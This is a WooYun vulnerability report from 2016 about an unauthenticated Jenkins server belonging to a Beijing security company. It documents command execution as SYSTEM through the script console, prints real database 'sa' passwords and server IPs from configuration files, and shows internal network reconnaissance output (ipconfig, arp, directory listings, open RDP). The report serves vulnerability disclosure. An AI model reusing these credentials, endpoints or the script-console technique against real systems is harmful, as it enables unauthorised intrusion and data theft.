当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0188450

漏洞标题:鼎立安信某系统未授权访问(涉及多个项目源码)/导致命令执行/system权限/可登录终端渗透内网

相关厂商:北京鼎立安信科技有限公司

漏洞作者: 路人甲

提交时间:2016-03-24 13:54

修复时间:2016-05-08 13:54

公开时间:2016-05-08 13:54

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

mask 区域
*****^科技^*****
1.http://**.**.**/_
**********
*****题^*****
2.http://**.**.**/_
**********
*****^^权^*****
**********
*****40075c0b680569d54480.png&qu*****
**********
*****项^*****
*****6a214202063201907fe3.png&qu*****
**********
3.://**.**.**//182.92.162.3:8080/job/BWU_SIMP/ws/%E5%AD%90%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3/</code>_
**********
*****afad19d1c281196a2e2a.png&qu*****
**********
4.://**.**.**//182.92.162.3:8080/job/BWU_SIMP/ws/%E5%AD%90%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3/%E5%AD%90%E7%B3%BB%E7%BB%9F%E4%B8%AD%E9%97%B4%E4%BB%B6%E7%9B%B8%E5%85%B3%E7%A8%8B%E5%BA%8F/1226%E5%AD%90%E7%B3%BB%E7%BB%9F/1226%E5%B7%A1%E6%9B%B4/PetrolSystem/App.config/*view*/</code>_
*****^几个s*****
*****更数据库*****
*****nitial Catalog=BSPatrol;User ID=sa;Pa*****
*****数据库*****
*****;Initial Catalog=1226;User ID=sa;Pas*****
*****数据库*****
*****al Catalog=AIO20150803150434;User ID=sa;*****
*****更新时*****
*****value="01:00&q*****
**********
*****^水潭 *****
**********
*****一^*****
**********
*****^^*****
5.http://**.**.**/script_
**********
*****m^*****
**********
*****ae53b2c4cfeca7112dd1.png&qu*****
***** (部^*****
*****^^*****
*****适配器 ^*****
**********
*****S 后缀 . *****
*****. . . . . : Net*****
*****. . . . . . : 0*****
***** . . . . . *****
*****^. . . . . .*****
*****. . : fe80::2ded:d17*****
*****. . . . . : 10.*****
*****. . . . . . . *****
*****. . . . . .*****
*****. . . . . . *****
***** : 00-01-00-01-19-6E*****
***** . . . . . . *****
***** *****
*****. . . . . : 已*****
**********
*****^^^*****
*****:\ *****
***** <DIR> *****
*****; 在^*****
*****DIR> *****
*****gt; ^*****
*****R> *****
*****R> *****
*****t;DIR> *****
*****DIR> *****
*****t;DIR> *****
*****DIR> *****
***** 鼎立安^*****
*****管理\\HRG*****
*****^^帴鏁版^*****
*****0.90;Initial Catalog=HRG;User ID=sa;Pas*****
*****2.3;Initial Catalog=HRG;User ID=sa;P*****
*****s><*****
**********
*****开^*****
*****8f4f8ab1d7a3a8f14abb.png&qu*****
**********
***** 10.171.11*****
*****^^理地址 *****
*****-0c-9f-f2-bc *****
*****-6a-aa-0d-bc *****
*****-6a-a2-a6-3c *****
*****-ff-ff-ff-ff *****
*****-5e-00-00-16 *****
*****-5e-00-00-fc *****
*****-5e-4d-7c-d5 *****
*****-5e-7f-ff-fa *****
*****-ff-ff-ff-ff *****
**********
*****2.162.3*****
*****^^理地址 *****
*****-0c-9f-f3-20 *****
*****-6a-aa-0d-bc *****
*****-6a-a2-a6-3c *****
*****-ff-ff-ff-ff *****
*****-5e-00-00-16 *****
*****-5e-00-00-fb *****
*****-5e-00-00-fc *****
*****-5e-4d-7c-d5 *****
*****7f-ff-fa 静^*****

漏洞证明:

北京鼎立安信科技有限公司
http://www.dlax.com.cn/
存在问题的url
http://www.dlax.com.cn:8080/
jenkins未授权访问

111.png


这么多项目。

111.png


http://182.92.162.3:8080/job/BWU_SIMP/ws/%E5%AD%90%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3/


111.png


http://182.92.162.3:8080/job/BWU_SIMP/ws/%E5%AD%90%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3/%E5%AD%90%E7%B3%BB%E7%BB%9F%E4%B8%AD%E9%97%B4%E4%BB%B6%E7%9B%B8%E5%85%B3%E7%A8%8B%E5%BA%8F/1226%E5%AD%90%E7%B3%BB%E7%BB%9F/1226%E5%B7%A1%E6%9B%B4/PetrolSystem/App.config/*view*/


部分内容 好几个sa密码

<!--巡更数据库地址-->
<add key="ConnDB" value="Data Source=23.48.38.240;Initial Catalog=BSPatrol;User ID=sa;Password=simp2014;Max Pool Size = 512;" />
<!--平台数据库地址-->
<add key="SimpDB" value="Data Source=23.48.38.239;Initial Catalog=1226;User ID=sa;Password=simp2014;Max Pool Size = 512;" />
<!--达实数据库地址-->
<add key="DSConnDB" value="Data Source=23.48.38.240;Initial Catalog=AIO20150803150434;User ID=sa;Password=simp2014;Max Pool Size = 512;" />
<!--定时更新时间-->
<add key="TimeFlag" value="01:00" />


什么农大 积水潭 都有
不在一一截图
命令执行
http://182.92.162.3:8080/script
system权限

111.png


ipconfig /all (部分内容)
内网环境

以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Net Device PV Driver
物理地址. . . . . . . . . . . . . : 00-16-3E-00-16-64
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::2ded:d17b:133a:b7b4%13(首选)
IPv4 地址 . . . . . . . . . . . . : 10.171.114.103(首选)
子网掩码 . . . . . . . . . . . . : 255.255.248.0
默认网关. . . . . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 369104446
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-19-6E-83-66-02-00-4C-4F-4F-50
DNS 服务器 . . . . . . . . . . . : 10.202.72.118
10.202.72.116
TCPIP 上的 NetBIOS . . . . . . . : 已启用


主站就在这
dir d:\

2016/03/15  10:35    <DIR>          人脸识别
2016/01/07 12:13 <DIR> 在线考试相关文件
2016/02/26 11:50 <DIR> 安装软件
2016/03/08 10:12 <DIR> 户籍项目管理
2016/03/17 14:09 <DIR> 手机测试用
2015/11/18 15:43 <DIR> 新建文件夹
2016/01/29 14:45 <DIR> 无用
2016/03/11 15:29 <DIR> 测试用的
2016/02/24 11:28 <DIR> 超图
2015/11/06 10:27 <DIR> 项目备份
2016/01/26 11:21 <DIR> 鼎立安信主页


type d:\\户籍项目管理\\HRG\\Web.config

<!--杩炴帴鏁版嵁搴�->
<!--<add key="ConnectDB" value="Data Source=192.168.0.90;Initial Catalog=HRG;User ID=sa;Password=simp2014;Max Pool Size = 512;"/>-->
<add key="ConnectDB" value="Data Source=182.92.162.3;Initial Catalog=HRG;User ID=sa;Password=simp2014;Max Pool Size = 512;"/>
</appSettings>


3389是开着的

111.png


接口: 10.171.114.103 --- 0xd
Internet 地址 物理地址 类型
10.171.119.247 00-00-0c-9f-f2-bc 动态
10.171.119.248 00-2a-6a-aa-0d-bc 动态
10.171.119.249 00-2a-6a-a2-a6-3c 动态
10.171.119.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.252 01-00-5e-00-00-fc 静态
239.77.124.213 01-00-5e-4d-7c-d5 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态
255.255.255.255 ff-ff-ff-ff-ff-ff 静态
接口: 182.92.162.3 --- 0xe
Internet 地址 物理地址 类型
182.92.163.247 00-00-0c-9f-f3-20 动态
182.92.163.248 00-2a-6a-aa-0d-bc 动态
182.92.163.249 00-2a-6a-a2-a6-3c 动态
182.92.163.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.251 01-00-5e-00-00-fb 静态
224.0.0.252 01-00-5e-00-00-fc 静态
239.77.124.213 01-00-5e-4d-7c-d5 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态


修复方案:

加个验证

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)